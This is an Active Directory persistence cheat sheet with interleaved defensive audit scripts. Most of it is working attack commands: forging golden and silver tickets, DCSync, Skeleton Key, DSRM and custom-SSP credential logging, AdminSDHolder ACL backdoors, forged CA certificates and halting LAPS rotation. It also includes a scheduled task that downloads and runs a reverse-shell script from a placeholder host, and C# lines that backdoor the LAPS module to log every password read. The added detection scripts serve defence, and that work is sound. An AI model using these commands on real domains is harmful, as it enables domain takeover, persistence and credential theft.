- Golden Ticket
- Silver Ticket
- Skeleton Key
- DSRM
- Custom SSP - Track logons
- ACL
- Constrained Delegation
- Computer Account
- Active Directory Certificate Services
- LAPS
Golden Ticket
- Get the krbtgt hash (needs Domain Admin rights on a DC, or replication/DCSync rights on the domain)
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <DC NAME>
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DOMAIN>\krbtgt"'
.\SafetyKatz.exe "lsadump::lsa /patch" "exit"
.\SafetyKatz.exe "lsadump::dcsync /user:<DOMAIN>\krbtgt" "exit"
- Use /ticket instead of /ptt to save the ticket to a file instead of injecting it into the current PowerShell process
- /id:500 and /groups:512 put the built-in Administrator RID and the Domain Admins group in the PAC; /startoffset, /endin and /renewmax are minutes (0, 600 and 10080 mimic the default 10-hour lifetime and 7-day renewal so the ticket does not stand out)
- To get the domain SID use Get-DomainSID from PowerView
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN SID> /krbtgt:<HASH> /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN SID> /krbtgt:<HASH> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
- Verify the ticket against the DC (the DCSync only works if the forged PAC carries DA/replication rights)
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DOMAIN>\krbtgt"'
Get-WmiObject -Class win32_operatingsystem -ComputerName <DC NAME>
Silver Ticket
- Use the NTLM hash of the target computer account (<TARGET>$, from lsadump::lsa /patch or dcsync). The forged TGS is validated by the service with its own key, so the DC is never contacted
- Other services are HOST, RPCSS, WSMAN (and LDAP on a DC for DCSync)
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN SID> /target:<TARGET> /service:CIFS /rc4:<LOCAL COMPUTER HASH> /ptt"'
ls \\<TARGET>\c$\
- A ticket for HOST lets you create and run scheduled tasks on the target
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN SID> /target:<TARGET> /service:HOST /rc4:<LOCAL COMPUTER HASH> /ptt"'
schtasks /create /S <TARGET> /SC Weekly /RU "NT Authority\SYSTEM" /TN "Reverse" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1''')'"
schtasks /Run /S <TARGET> /TN "Reverse"
- For WMI forge two tickets, one for HOST and one for RPCSS
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN SID> /target:<TARGET> /service:HOST /rc4:<LOCAL COMPUTER HASH> /ptt"'
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<DOMAIN> /sid:<DOMAIN SID> /target:<TARGET> /service:RPCSS /rc4:<LOCAL COMPUTER HASH> /ptt"'
Get-WmiObject -Class win32_operatingsystem -ComputerName <TARGET>
Skeleton Key
- Patches LSASS on the DC so that the password "mimikatz" is accepted for any domain account alongside the real password. Needs DA rights, is not persistent across a reboot, and fails when LSASS runs as a protected process (RunAsPPL) unless a driver is loaded first
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -Computername <DC NAME>
DSRM
- Dump the DSRM (local) administrator hash from the DC's SAM
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername <DC NAME>
- Allow the DSRM account to log on over the network (2 = always allowed; by default it can only be used in DSRM mode). This registry value is the persistence
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
- Pass the hash. The DSRM account is local to the DC, so /domain is the DC's hostname, not the domain name
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:<DC NAME> /user:Administrator /ntlm:<HASH> /run:powershell.exe"'
Enter-PSSession -ComputerName <DC NAME> -Authentication Negotiate
Custom SSP - Track logons
- Drop mimilib.dll into System32 and add mimilib to the Security Packages value under HKLM:\SYSTEM\CurrentControlSet\Control\Lsa (and Lsa\OSConfig). LSASS loads it at the next boot
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages
- All logons (with clear-text passwords) are then logged to C:\Windows\System32\kiwissp.log
- Alternatively inject the SSP into LSASS memory without a reboot (lost on reboot); this one logs to C:\Windows\System32\mimilsa.log
Invoke-Mimikatz -Command '"misc::memssp"'
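Added example (not part of the original cheat sheet): a PowerShell check for the two registry-based persistence techniques above, DSRM and custom SSP. It reads DsrmAdminLogonBehavior, compares both Security Packages values against an allow-list of stock SSPs (an assumption; adjust it to your build), and looks for the log files mimilib and memssp write. Run it locally on the DC being audited with administrative rights.

```powershell
# Added example: audit the LSA registry values modified by the DSRM and custom-SSP techniques.
# Assumes it runs on the host being checked (normally a DC) as an administrator.

function Get-LsaPersistenceIndicator {
    param(
        # Stock SSP names; the literal '""' is the default content of Lsa\Security Packages
        # on current Windows. This allow-list is an assumption, tune it to your baseline.
        [string[]]$KnownPackages = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg',
                                     'pku2u', 'cloudap', '""')
    )
    $findings = @()
    $lsaPath  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

    # DsrmAdminLogonBehavior: absent/0 = DSRM account usable only in DSRM mode,
    # 1 = usable when the AD service is stopped, 2 = usable at any time (network logon).
    $dsrm = (Get-ItemProperty -Path $lsaPath).DsrmAdminLogonBehavior
    if ($null -ne $dsrm -and $dsrm -ne 0) {
        $findings += [pscustomobject]@{
            Indicator = 'DsrmAdminLogonBehavior'
            Value     = $dsrm
            Detail    = 'DSRM administrator may log on outside DSRM'
        }
    }

    # Security Packages lives under both Lsa and Lsa\OSConfig; an attacker may edit either.
    foreach ($path in $lsaPath, "$lsaPath\OSConfig") {
        $pkgs = (Get-ItemProperty -Path $path -Name 'Security Packages' -ErrorAction SilentlyContinue).'Security Packages'
        foreach ($p in @($pkgs)) {
            if ($p -and ($KnownPackages -notcontains $p.ToLower())) {
                $findings += [pscustomobject]@{
                    Indicator = 'Security Packages'
                    Value     = $p
                    Detail    = "Unexpected SSP registered in $path"
                }
            }
        }
    }

    # Artifacts named on this page: the SSP DLL and the credential logs it writes.
    foreach ($file in 'C:\Windows\System32\mimilib.dll',
                      'C:\Windows\System32\kiwissp.log',
                      'C:\Windows\System32\mimilsa.log') {
        if (Test-Path -Path $file) {
            $findings += [pscustomobject]@{
                Indicator = 'SSP artifact'
                Value     = $file
                Detail    = 'File present on disk'
            }
        }
    }
    return $findings
}

Get-LsaPersistenceIndicator | Format-Table -AutoSize
```

An SSP injected with misc::memssp leaves no registry entry, so for that variant only the mimilsa.log check and LSASS memory inspection apply; the registry checks catch the mimilib.dll variant and the DSRM change.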
ACL
- Check which rights a user already has on the domain root (replication rights or GenericAll are enough for DCSync)
Get-ObjectAcl -DistinguishedName "dc=<DOMAIN>,dc=<TOP DOMAIN>" -ResolveGUIDs | ? {($_.IdentityReference -match "<username>") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}
- AdminSDHolder: SDProp copies its ACL to every protected object (Domain Admins, Enterprise Admins, Administrators, krbtgt, ...) every 60 minutes by default, so an ACE added here is re-applied even if removed from the group itself
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=<DOMAIN>,dc=<TOP DOMAIN>' -PrincipalIdentity <USERNAME> -Rights All -PrincipalDomain <DOMAIN> -TargetDomain <DOMAIN> -Verbose
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=<DOMAIN>,dc=<TOP DOMAIN>' -PrincipalIdentity <USERNAME> -Rights ResetPassword -PrincipalDomain <DOMAIN> -TargetDomain <DOMAIN> -Verbose
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,dc=<DOMAIN>,dc=<TOP DOMAIN>' -PrincipalIdentity <USERNAME> -Rights WriteMembers -PrincipalDomain <DOMAIN> -TargetDomain <DOMAIN> -Verbose
- Trigger SDProp instead of waiting an hour
Invoke-SDPropagator -showProgress -timeoutMinutes 1
- Before Server 2008 the task is called FixUpInheritance
Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose
- Verify the rights were propagated to Domain Admins
Get-ObjectAcl -SamaccountName "Domain Admins" -ResolveGUIDs | ?{$_.identityReference -match '<username>'}
- Abuse the propagated rights: add a member (WriteMembers)
Add-DomainGroupMember -Identity "Domain Admins" -Members <USERNAME> -Verbose
or
net group "Domain Admins" <USERNAME> /add /domain
- Or reset a protected user's password (ResetPassword)
Set-DomainUserPassword -Identity <USERNAME> -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force ) -Verbose
- Rights on the domain root itself: full control, or only the replication rights needed for DCSync (less noisy)
Add-DomainObjectAcl -TargetIdentity "dc=<DOMAIN>,dc=<TOP DOMAIN>" -PrincipalIdentity <USER> -Rights All -PrincipalDomain <DOMAIN> -TargetDomain <DOMAIN> -Verbose
Add-DomainObjectAcl -TargetIdentity "dc=<DOMAIN>,dc=<TOP DOMAIN>" -PrincipalIdentity <USER> -Rights DCSync -PrincipalDomain <FQDN DOMAIN> -TargetDomain <FQDN DOMAIN> -Verbose
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DOMAIN>\krbtgt"'
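Added example (not from the page; it uses the RSAT ActiveDirectory module rather than PowerView): the defender's counterpart of the ACL abuse above. It walks the ACLs of the domain root and of AdminSDHolder and reports every Allow ACE that grants a write-type right or a replication extended right to a principal outside a small allow-list of built-in owners. The allow-list is an assumption; extend it with groups that legitimately hold such rights in your forest.

```powershell
# Added example: report non-default principals holding write or replication rights on the
# domain root and on AdminSDHolder. Assumes the ActiveDirectory module (AD: drive) and a
# domain user that can read the two objects' security descriptors.
Import-Module ActiveDirectory

# Extended-right GUIDs; DCSync needs the first two.
$ReplRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}
$AllRights = '00000000-0000-0000-0000-000000000000'

function Get-SuspiciousAce {
    param(
        [Parameter(Mandatory)] [string]$DistinguishedName,
        # Principals expected to hold powerful rights here (assumption; add your own tier-0 groups).
        [string[]]$Trusted = @('NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SELF', 'BUILTIN\Administrators',
                               'Domain Admins', 'Enterprise Admins', 'ENTERPRISE DOMAIN CONTROLLERS',
                               'Enterprise Read-only Domain Controllers')
    )
    $acl = Get-Acl -Path "AD:\$DistinguishedName"
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $id = $ace.IdentityReference.Value
        if ($Trusted | Where-Object { $id -like "*$_" }) { continue }

        $rights  = $ace.ActiveDirectoryRights.ToString()
        $guid    = $ace.ObjectType.Guid
        $isWrite = $rights -match 'GenericAll|GenericWrite|WriteDacl|WriteOwner|WriteProperty'
        # ExtendedRight with an all-zero ObjectType means every extended right, replication included.
        $isRepl  = ($rights -match 'ExtendedRight') -and ($ReplRights.ContainsKey($guid) -or $guid -eq $AllRights)
        if ($isWrite -or $isRepl) {
            [pscustomobject]@{
                Object     = $DistinguishedName
                Identity   = $id
                Rights     = $rights
                ObjectType = if ($ReplRights.ContainsKey($guid)) { $ReplRights[$guid] } else { $guid }
                Inherited  = $ace.IsInherited
            }
        }
    }
}

$domainDN = (Get-ADDomain).DistinguishedName
Get-SuspiciousAce -DistinguishedName $domainDN
Get-SuspiciousAce -DistinguishedName "CN=AdminSDHolder,CN=System,$domainDN"
```

Expect some legitimate noise on the domain root (Key Admins / Enterprise Key Admins on msDS-KeyCredentialLink, Exchange groups where Exchange is installed); anything else with replication rights, and any unexpected identity on AdminSDHolder, deserves a look, since SDProp will keep re-applying the latter.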
Security descriptors - WMI
- Modify the DCOM and WMI namespace security descriptors on a machine so <USERNAME> can run WMI queries on it without being a local administrator
. .\Set-RemoteWMI.ps1
- On the local machine
Set-RemoteWMI -Username <USERNAME> -Verbose
- On a remote machine, using the current session's privileges or explicit credentials
Set-RemoteWMI -Username <USERNAME> -Computername <COMPUTERNAME> -namespace 'root\cimv2' -Verbose
- Only root\cimv2 and nested namespaces
Set-RemoteWMI -Username <USERNAME> -Computername <COMPUTERNAME> -Credential Administrator -namespace 'root\cimv2' -Verbose
- Remove the permissions
Set-RemoteWMI -Username <USERNAME> -Computername <COMPUTERNAME> -namespace 'root\cimv2' -Remove -Verbose
- Verify as <USERNAME>
Get-WmiObject -Class win32_operatingsystem -ComputerName <COMPUTERNAME>
Security descriptors - PowerShell Remoting
- Same idea for the WinRM/PSRemoting endpoint security descriptor
. .\Set-RemotePSRemoting.ps1
Set-RemotePSRemoting -Username <USERNAME> -Verbose
Set-RemotePSRemoting -Username <USERNAME> -Computername <COMPUTERNAME> -Verbose
- Remove the permissions
Set-RemotePSRemoting -Username <USERNAME> -Computername <COMPUTERNAME> -Remove
Security descriptors - Remote Registry
- Using the DAMP toolkit (https://github.com/HarmJ0y/DAMP): grant <USERNAME> read access to the SAM, SECURITY and LSA registry keys on the target so hashes can later be pulled over the remote registry service without admin rights
. .\Add-RemoteRegBackdoor.ps1
. .\RemoteHashRetrieval.ps1
Add-RemoteRegBackdoor -Computername <COMPUTERNAME> -Trustee <USERNAME> -Verbose
- Retrieve the machine account hash (silver tickets), local account hashes and cached domain credentials
Get-RemoteMachineAccountHash -Computername <COMPUTERNAME> -Verbose
Get-RemoteLocalAccountHash -Computername <COMPUTERNAME> -Verbose
Get-RemoteCachedCredential -Computername <COMPUTERNAME> -Verbose
Constrained Delegation
- Needs write access (GenericAll/GenericWrite) to a user object. Give it an SPN, the target SPN it may delegate to, and the TRUSTED_TO_AUTH_FOR_DELEGATION flag (16777216 = 0x1000000) so it can do protocol transition (S4U2Self) for any user without that user authenticating
Set-DomainObject -Identity <USER> -Set @{serviceprincipalname='dev/svc'}
Set-DomainObject -Identity <USER> -Set @{"msds-allowedtodelegateto"="ldap/<FQDN DC>"}
Set-DomainObject -Identity <USER> -Xor @{"useraccountcontrol"="16777216"}
Get-DomainUser -TrustedToAuth
- Abuse with kekeo (needs the user's password or hash): ask a TGT, then S4U2Self + S4U2Proxy as Administrator to the LDAP service on the DC, inject the ticket and DCSync
kekeo# tgt::ask /user:<USER> /domain:<DOMAIN> /password:<PASSWORD>
kekeo# tgs::s4u /tgt:<KIRBI FILE> /user:Administrator@<DOMAIN> /service:ldap/<FQDN DC>
Invoke-Mimikatz -Command '"kerberos::ptt <KIRBI FILE>"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<DOMAIN>\krbtgt"'
- Or with Rubeus in one step
Rubeus.exe hash /password:<PASSWORD> /user:<USER> /domain:<DOMAIN>
Rubeus.exe s4u /user:<USER> /rc4:<NTLM HASH> /impersonateuser:administrator /msdsspn:ldap/<FQDN DC> /domain:<DOMAIN> /ptt
C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:<DOMAIN>\krbtgt" "exit"
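Added example (not from the page; RSAT ActiveDirectory module instead of PowerView): enumerate every account configured for constrained delegation, decode whether protocol transition is set from userAccountControl, and flag allowed SPNs whose host is a domain controller. The service class of the allowed SPN matters little, because the service name in a forged S4U2Proxy ticket can be swapped (Rubeus /altservice); the host is what decides whether the delegation reaches ldap on a DC and therefore DCSync.

```powershell
# Added example: list constrained-delegation accounts and the hosts they may delegate to,
# marking DC targets. Assumes the ActiveDirectory module and any domain user (the attributes
# are readable by Authenticated Users).
Import-Module ActiveDirectory

$TrustedToAuthForDelegation = 0x1000000   # 16777216, the value XORed into userAccountControl above

function Get-ConstrainedDelegationPath {
    $dcHosts = @((Get-ADDomainController -Filter *).HostName | ForEach-Object { $_.ToLower() })

    Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
                 -Properties msDS-AllowedToDelegateTo, userAccountControl, sAMAccountName |
      ForEach-Object {
        $acct = $_
        $uac  = [int]$acct.userAccountControl
        foreach ($spn in @($acct.'msDS-AllowedToDelegateTo')) {
            # SPN format is class/host[:port][/name]; only the host part is needed here.
            $svc, $target = $spn -split '/', 2
            $targetHost = if ($target) { (($target -split ':')[0] -split '/')[0].ToLower() } else { '' }
            [pscustomobject]@{
                Account            = $acct.sAMAccountName
                Class              = $acct.ObjectClass
                ProtocolTransition = ($uac -band $TrustedToAuthForDelegation) -ne 0
                AllowedSPN         = $spn
                TargetIsDC         = $dcHosts -contains $targetHost
            }
        }
      }
}

# Rows with both ProtocolTransition and TargetIsDC set are the path used above:
# S4U2Self as any user, S4U2Proxy to the DC, service rewritten to ldap if needed.
Get-ConstrainedDelegationPath | Sort-Object TargetIsDC -Descending | Format-Table -AutoSize
```

Accounts without protocol transition (Kerberos-only constrained delegation) still appear; they can be abused only when a real user's service ticket to the account is captured, so they rank lower but are worth tracking.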
Computer Account
- https://github.com/Kevin-Robertson/Powermad
- Any domain user can create machine accounts up to ms-DS-MachineAccountQuota (default 10). The new account is low privileged on its own, so for persistence add it to Domain Admins or grant it rights through ACLs; unlike a real computer it never rotates its password, and machine accounts are rarely reviewed
New-MachineAccount -Domain <DOMAIN> -MachineAccount <NAME OF MACHINE TO ADD> -DomainController <IP> -Verbose
- Use it (the sAMAccountName ends with $)
runas /netonly /user:<DOMAIN>\<COMPUTERACCOUNTNAME>$ powershell
Active Directory Certificate Services
- Important to look at in a template:
- The validity period (the certificate keeps working for that long, through password resets)
- Authorization (manager approval) is not required
- Who has enrollment rights
.\Certify.exe find /clientauth
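Added example (not from the page and not Certify's code): the same triage with the RSAT ActiveDirectory module. It reads the templates from the configuration partition, keeps those with a client-authentication EKU (or no EKU, which means any purpose), decodes the validity period from pKIExpirationPeriod, and lists manager approval, required RA signatures and the principals holding the Enroll right. It goes one step beyond the three bullets by also reporting whether the enrollee may supply the subject, which is the extra condition that lets a requester obtain a certificate for another user.

```powershell
# Added example: enumerate certificate templates usable for domain logon and the
# properties that decide who can get one. Assumes the ActiveDirectory module; templates
# are readable by any authenticated user.
Import-Module ActiveDirectory

$ClientAuthOids = @('1.3.6.1.5.5.7.3.2',       # Client Authentication
                    '1.3.6.1.4.1.311.20.2.2',  # Smart Card Logon
                    '1.3.6.1.5.2.3.4',         # PKINIT Client Authentication
                    '2.5.29.37.0')             # Any Purpose
$EnrollRightGuid     = '0e10c968-78fb-11d2-90d4-00c04f79dc55'   # Certificate-Enrollment
$AutoEnrollRightGuid = 'a05b8cc2-17bc-4802-a710-e7c15ab866a2'   # Certificate-AutoEnrollment
$AllRightsGuid       = '00000000-0000-0000-0000-000000000000'

function Convert-PkiPeriod {
    # pKIExpirationPeriod is an 8-byte little-endian negative FILETIME interval (100 ns units).
    param([byte[]]$Bytes)
    if (-not $Bytes -or $Bytes.Length -ne 8) { return $null }
    [TimeSpan]::FromTicks(-[BitConverter]::ToInt64($Bytes, 0))
}

function Get-ClientAuthTemplate {
    $configNC = (Get-ADRootDSE).configurationNamingContext
    $base  = "CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNC"
    $props = 'msPKI-Certificate-Name-Flag', 'msPKI-Enrollment-Flag', 'msPKI-RA-Signature',
             'pKIExtendedKeyUsage', 'pKIExpirationPeriod', 'nTSecurityDescriptor'

    Get-ADObject -SearchBase $base -LDAPFilter '(objectClass=pKICertificateTemplate)' -Properties $props |
      ForEach-Object {
        $t   = $_
        $eku = @($t.pKIExtendedKeyUsage)
        # No EKU at all means the certificate is valid for any purpose, client auth included.
        $clientAuth = ($eku.Count -eq 0) -or [bool]($eku | Where-Object { $ClientAuthOids -contains $_ })
        if (-not $clientAuth) { return }

        $enrollers = @($t.nTSecurityDescriptor.Access |
            Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                ($_.ActiveDirectoryRights -match 'ExtendedRight|GenericAll') -and
                (@($EnrollRightGuid, $AutoEnrollRightGuid, $AllRightsGuid) -contains $_.ObjectType.Guid)
            } | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique)

        [pscustomobject]@{
            Template        = $t.Name
            Validity        = Convert-PkiPeriod $t.pKIExpirationPeriod
            ManagerApproval = (([int]$t.'msPKI-Enrollment-Flag') -band 0x2) -ne 0         # CT_FLAG_PEND_ALL_REQUESTS
            RASignatures    = [int]$t.'msPKI-RA-Signature'
            EnrolleeSubject = (([int]$t.'msPKI-Certificate-Name-Flag') -band 0x1) -ne 0   # CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
            Enrollers       = $enrollers -join '; '
        }
      }
}

# Templates a regular user could enroll in with no human in the loop:
Get-ClientAuthTemplate |
  Where-Object { -not $_.ManagerApproval -and $_.RASignatures -eq 0 -and
                 $_.Enrollers -match 'Domain Users|Authenticated Users|Domain Computers' } |
  Format-List
```

A template only matters if an enterprise CA publishes it (the certificateTemplates attribute on the CA's pKIEnrollmentService object); Certify find already cross-checks that, this script does not.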
- Request a certificate for the current user; it remains valid for the template's validity period even after the password is reset
.\Certify.exe request /ca:<CA NAME> /template:<TEMPLATE NAME>
- Or for the machine account (run from an elevated/SYSTEM context)
.\Certify.exe request /ca:<CA NAME> /template:<TEMPLATE NAME> /machine
- Steal the CA's certificate and private key. Execute on the CA server; you can generally tell which one is the CA key because Issuer and Subject are both set to the distinguished name of the CA
- https://github.com/GhostPack/SharpDPAPI
.\SharpDPAPI.exe certificates /machine
- Save the cert + key blocks in a ca.pem file and convert to PFX; set a password ("password" below)
openssl pkcs12 -in ca.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out ca.pfx
- Forge a certificate for any user with the stolen CA key. The forged cert was never issued by the CA, so it is not in the CA database and cannot be revoked; only replacing the CA key invalidates it
.\ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword "password" --Subject "CN=User" --SubjectAltName "Administrator@<DOMAIN>" --NewCertPath fake.pfx --NewCertPassword "password"
- Base64-encode the forged fake.pfx (not the CA pfx) and use it to get a TGT via PKINIT
cat fake.pfx | base64 -w 0
.\Rubeus.exe asktgt /user:Administrator /domain:<DOMAIN> /certificate:<BASE64 CERT> /password:password /nowrap
- Save the returned ticket as a kirbi if it is to be injected later
[System.IO.File]::WriteAllBytes("C:\Users\public\<USER>.kirbi", [System.Convert]::FromBase64String("<TICKET STRING>"))
LAPS
- Push the LAPS expiration time far into the future so the local administrator password stops rotating. The password will still reset if an admin uses the Reset-AdmPwdPassword cmdlet, or if "Do not allow password expiration time longer than required by policy" is enabled in the LAPS GPO
- The computer account has write access to its own ms-Mcs-AdmPwdExpirationTime, so run this as SYSTEM on the computer (or as a principal with write rights on the attribute). The value is a FILETIME in 100-ns ticks since 1601-01-01; the one below lands in the year 2338
Set-DomainObject -Identity <COMPUTER> -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
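Added example (not from the page): decode ms-Mcs-AdmPwdExpirationTime values and find computers whose LAPS expiry is further ahead than the policy's maximum password age, which is the footprint the Set-DomainObject command above leaves. It assumes the RSAT ActiveDirectory module and a 30-day maximum age (the LAPS default; pass your GPO value). The attribute is readable by anyone with read rights on the computer object, unlike ms-Mcs-AdmPwd, so this runs as an ordinary auditing account.

```powershell
# Added example: find LAPS expiration times that a compliant LAPS client could not have set.
# Assumes the ActiveDirectory module and read access to computer objects.
Import-Module ActiveDirectory

function ConvertFrom-AdmPwdExpiration {
    # The attribute holds a Windows FILETIME: 100-ns ticks since 1601-01-01 UTC, stored as a large integer.
    param([Parameter(Mandatory)][Int64]$FileTime)
    [DateTime]::FromFileTimeUtc($FileTime)
}

function Get-LapsExpirationAnomaly {
    param(
        # Maximum password age from the LAPS GPO; 30 days is the product default (assumption, set yours).
        [int]$MaxAgeDays = 30,
        [string]$SearchBase = (Get-ADDomain).DistinguishedName
    )
    $nowUtc = (Get-Date).ToUniversalTime()
    $limit  = $nowUtc.AddDays($MaxAgeDays)

    Get-ADComputer -LDAPFilter '(ms-Mcs-AdmPwdExpirationTime=*)' -SearchBase $SearchBase `
                   -Properties ms-Mcs-AdmPwdExpirationTime |
      ForEach-Object {
        $exp = ConvertFrom-AdmPwdExpiration ([Int64]$_.'ms-Mcs-AdmPwdExpirationTime')
        [pscustomobject]@{
            Computer   = $_.Name
            ExpiresUtc = $exp
            DaysAhead  = [math]::Round(($exp - $nowUtc).TotalDays, 1)
            # Nothing beyond now + MaxAge can come from a client honouring the policy.
            Suspicious = $exp -gt $limit
        }
      } | Where-Object Suspicious
}

# Decode the literal used in the cheat sheet, then sweep the domain.
ConvertFrom-AdmPwdExpiration 232609935231523081
Get-LapsExpirationAnomaly | Format-Table -AutoSize
```

Enabling "Do not allow password expiration time longer than required by policy" in the LAPS GPO makes the client clamp such values on its next run, which is why the note above lists it as something that defeats the technique.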
- Backdoor the LAPS PowerShell module (https://github.com/GreyCorbel/admpwd) so every password an admin reads with Get-AdmPwdPassword is also written to a file: in that cmdlet's ProcessRecord add the two marked lines after the first line
- Recompile and replace the DLL in
C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AdmPwd.PS\
PasswordInfo pi = DirectoryUtils.GetPasswordInfo(dn);                       // existing first line
var line = $"{pi.ComputerName} : {pi.Password}" + System.Environment.NewLine; // added: one entry per line
System.IO.File.AppendAllText(@"C:\Temp\LAPS.txt", line);                     // added: C:\Temp must exist
WriteObject(pi);                                                              // existing